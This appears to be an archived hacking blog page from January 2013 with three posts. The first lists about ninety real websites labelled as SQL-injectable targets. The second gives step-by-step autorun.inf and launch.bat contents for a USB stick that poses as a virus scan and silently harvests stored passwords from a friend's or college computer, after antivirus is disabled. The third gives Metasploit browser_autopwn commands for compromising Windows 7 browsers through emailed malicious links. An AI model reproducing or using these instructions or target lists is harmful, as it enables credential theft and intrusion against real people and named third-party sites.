Archive for January 2013

SQL Vulnerable Sites Updated

07:54:00 1 Comment
                                         SQL Vulnerable Sites [Latest Update]

 =x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x= =x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x= 
http://www.genhound.co.uk/source.php?id=477
http://www.lcoastpress.com/journal.php?id=8
http://www.travellers-tales.co.uk/travelJournal.php?id=42
http://www.arrowvalves.co.uk/content.php?id=8
http://www.reaplasrack.co.uk/content.php?id=129
http://www.arrowvalves.co.uk/content.php?id=28
http://www.woodlandsschool.org/content.php?id=1&text=
http://www.qwc.org.uk/projects.php?ID=1
http://www.vx10.co.uk/blog.php?Id=5
http://www.readingmatters.co.uk/author.php?id=12
http://www.readingmatters.co.uk/author.php?id=56
http://www.topgear-cars.co.uk/popup2.php?id=394
http://www.regendafirst.org.uk/howto.php?id=1
http://www.cyberthing.net/video-play.php?id=105
http://www.thehopeforamerica.com/play.php?id=3392
http://www.woodfines.co.uk/press_release.php?id=7
http://www.areyoureadytoorder.co.uk/interview.php?id=10
http://planet.selfcateringhols.com/country.php?id=504
http://www.wellthatsucked.co.uk/viewflash.php?id=2
http://championship.netii.net/smt/dskill.php?id=117
http://www.robertsmith.co.uk/links.php?id=6
http://www.zwcad.org/download_form.php?id=107
http://www.yhmag.co.uk/comp_form.php?id=78
http://www.athenapress.com/book.php?ID=2693
http://www.lcoastpress.com/book.php?id=187
http://abslatin.co.uk/node.php?id=16
http://www.umtv.co.uk/release.php?id=524
http://www.emiclassics.co.uk/release.php?id=13828
http://emiclassics.co.uk/release.php?id=5099962946223
http://www.onradio.gr/play_old.php?id=388
http://www.onradio.gr/play_old.php?id=245
http://www.leadacidbatteryinfo.org/newsdetail.php?id=10
https://powertraveller.com/news/detail.php?id=000126
http://www.firstsquare.com/product_item.php?id=35
http://www.standardbred.org/pages.php?id=16
http://www.nanogenad.net/prod_detail.php?id=1&action=cat&check_prod=51
http://www.tek-tite.com/src/product_info.php?id=2162
http://www.thefutureisfierce.com/releases.php?ID=25
http://inrecs.com/releases.php?id=47
http://www.metronome-technologie.com/admin/produit.php?id_titre=184
http://www.thedockyard.co.uk/photo_gallery_pop.php?id=23
http://www.thedockyard.co.uk/photo_gallery_pop.php?id=314
http://www.arrowvalves.co.uk/productdetail.php?id=1
http://www.arrowvalves.co.uk/productdetail.php?id=10
http://www.adas-fusion.eu/theme.php?id=3
http://blackhistorycanada.ca/theme.php?id=2
http://www.twitney.co.uk/theme.php?id=7
http://rainydaymv.com/toys/games-toys-all-ages.php?id=21
http://www.minesandcommunities.org/look.php?id=87
http://www.minesandcommunities.org/look.php?id=117
http://www.coastal-koi.com/view_product.php?id=1393
http://www.istl.com/view-product.php?ID=56
http://www.musicintheround.co.uk/event.php?id=236
http://www.theatreroyalwindsor.co.uk/event.php?id=273
http://biblioteca-ua.com/select_biblio.php?id=1599
http://biblioteca-ua.com/select_biblio.php?id=712
http://www.dwib.org/faq2.php?id=8
http://www.wardrobesystems.co.uk/preview.php?id=365
http://www.crewsaver.co.uk/download.php?id=1240
http://www.newmasterplanning.com/project_main.php?id=16
http://aggiehill.com/aggie-hill-private-showing.php?id=7
http://www.emaxxtech.com/view_faq.php?id=34
http://www.neilprydemaui.com/category.php?id=6
http://www.cornerstone.org.uk/publications.php?id=newsletters
http://mx5.brighton-rock.net/BandInfo.php?ID=315
http://mx5.brighton-rock.net/BandInfo.php?ID=448
http://www.brighton-rock.net/BandInfo.php?ID=136
http://www.brighton-rock.net/BandInfo.php?ID=495
http://nightlife.e-rockford.com/localbands/bandinfo.php?id=314
http://nightlife.e-rockford.com/localbands/bandinfo.php?id=217
http://www.oiwsba.com/oiwsba/memberinfo.php?id=54
http://www.bayareaassn.com/memberinfo.php?id=1
http://www.bayareaassn.com/memberinfo.php?id=7
http://www.oiwsba.com/oiwsba/memberinfo.php?id='59
http://www.atitelemetry.com/viewapp.php?id=7
http://www.medix.com.hr/aboutbook.php?id=39
http://familynewsabout.com/aboutBook.php?id=59
http://familynewsabout.com/aboutBook.php?id=92133
http://www.thehousedirectory.com/view.php?subcat=106
http://bbqjointz.com/show.php?xplacesid=997
http://www.northport.com.my/info_general.php?menu=General%20Info
http://www.geruest-bau.at/general.php?menu_id=23
http://www.roesslhuber.com/general.php?menu_id=1
http://www.nahipa.org/Chapter_info.php?Chapter=2
http://www.webdictionary.co.uk/index.php?query=gorgeous
http://www.webdictionary.co.uk/index.php?query=precipitation
http://www.fip.nl/www/?page=pe_wlops_ns_poland
http://www.stjudes-southsea.org.uk/home.php?category_ID=25
http://www.stjudes-southsea.org.uk/home.php?category_ID=4
http://www.omakitchens.com/uk/home.php?category=classic
http://tutors4you.com/home.php?category2_id=34

How to hack passwords using USB Drive

07:29:00 1 Comment
How to hack passwords using USB Drive:

Today I will show you how to hack Passwords using an USB Pen Drive.
As we all know, Windows stores most of the passwords which are used on a daily
basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows
messenger etc.

Along with these, Windows also stores passwords of Outlook Express, SMTP, POP,
FTP accounts and auto-complete passwords of many browsers like IE and Firefox.
There exists many tools for recovering these passswords from their stored places.
Using these tools and an USB pendrive you can create your own rootkit to hack
passwords from your friend’s/college Computer.

We need the following tools to create our rootkit:
MessenPass: Recovers the passwords of most popular Instant Messenger programs:
MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL
Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassView: Recovers the passwords of the following email programs: Outlook
Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook
2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape
Mail, Mozilla Thunderbird, Group Mail Free.

Mail PassView can also recover the passwords of Web-based email accounts (HotMail,
Yahoo!, Gmail), if you use the associated programs of these accounts.
IE Passview: IE PassView is a small utility that reveals the passwords stored by
Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as
older versions of Internet explorer, v4.0 - v6.0
Protected Storage PassView: Recovers all passwords stored inside the Protected
Storage, including the AutoComplete passwords of Internet Explorer, passwords of
Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view
the user names and passwords stored by Mozilla Firefox Web browser. By default,
PasswordFox displays the passwords stored in your current profile, but you can easily
select to watch the passwords of any other Firefox profile. For each password entry,
the following information is displayed: Record Index, Web Site, User Name,
Password, User Name Field, Password Field, and the Signons filename.
------------------------------------------------------------------------------------------------
Here is a step by step procedre to create the password hacking toolkit:

NOTE: You must temporarily disable your antivirus before following these steps.
1. Download all the 5 tools, extract them and copy only the executables(.exe files)
into your USB Pendrive.
ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe
into your USB Drive.

2. Create a new Notepad and write the following text into it:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy theautorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.
Now your rootkit is ready and you are all set to hack the passwords. You can use this
pendrive on your friend’s PC or on your college computer. Just follow these steps
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have
created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password hacking tools will silently get executed in the background
(This process takes hardly a few seconds). The passwords get stored in the .TXT
files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP,Vista and 7
NOTE: This procedure will only recover the stored passwords (if any) on the
Computer.

Hack Windows 7 with Metasploit

08:47:00 4 Comments
What is Metasploit?

Metasploit is a framework which is used for the hacking of different kinds of applications, operating systems, web applications etc. Metasploit contains various exploits, scanners, payloads, modules, auxiliaires, vulnerability assessments etc.
Requirements:-
 VULNERABILITY
 EXPLOIT
 PAYLOAD
Vulnerability is a weakness or hole of the system through which an attacker enters into the machine.
Exploit is a program or code which takes the advantage of the vulnerability to break the security of system.
Payload is a program which gives control of the system.
Step 1 –
Power on your Backtrack Operating System with
Username=root and Password=toor (By Default)
After login to this, Type “startx” for entering into GUI Mode.
Step 2 –
Now For Hacking Windows, You have to Start Metasploit Framework.
So Open your terminal and type this command,

root@bt:~# msfconsole






 Step 3 –
Now For hacking windows 7, we use this exploit named as browser Autopwn
root@bt:~# use auxiliary/server/browser_autopwn
The basic idea behind this module is that it creates a web server in our local machine which will contain different kind of browser exploits.
When the user will open the malicious link then the execution of the exploits will start against the browser of the user and if one of the exploits is successful a meterpreter session will open.







Step 4 –
Now Type “show options” to check all options related to this exploit




Step 5 –
Now Set your local host IP by typing this command,
root@bt:~# set LHSOT 192.168.17.133



To set Port, type this command,
root@bt:~# set SRVPORT 80


In order to prevent Metasploit to set up random URL’s, we use URIPATH
root@bt:~# set URIPATH /


Step 6 –
Now type “exploits” command
After the execution of this module we will notice that different exploits for a variety of browsers will start loading to our web server.




Now we can share the link through our email to our client employees.
Step 7 –
If any user opens the malicious link, the Autopwn module will try all these exploits in order to see if it can break into the client.
If the browser is vulnerable to any of these exploits meterpreter sessions will open.
To check all sessions, type this command,
root@bt:~# sessions -i


Step 8 –
To Open First Session, type this command
root@bt:~# sessions –i 1

Subscribe to: Posts (Atom)

Amit Vijayan

Amit Vijayan
Hack Ethically

About Me


I am an engineering student and i am very dedicated about Ethical Hacking. I have been learning "Ethical Hacking" for about 4 years now.
Though I'am not a pro hacker but also not a noob. I have enough knowledge to give others like me, a start for their Ethical Hacking & Cyber Security. As i keep learning new things, i keep updating them on the blog from basic to advanced level.
I started Ethical Hacking as a hobby which has now turned into my passion and i'am sure i will turn it into my profession through this blog.

Always be an Ethical Hacker.